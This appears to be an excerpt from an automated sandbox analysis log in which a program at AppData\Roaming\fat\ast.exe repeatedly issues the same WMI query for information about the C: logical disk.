                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
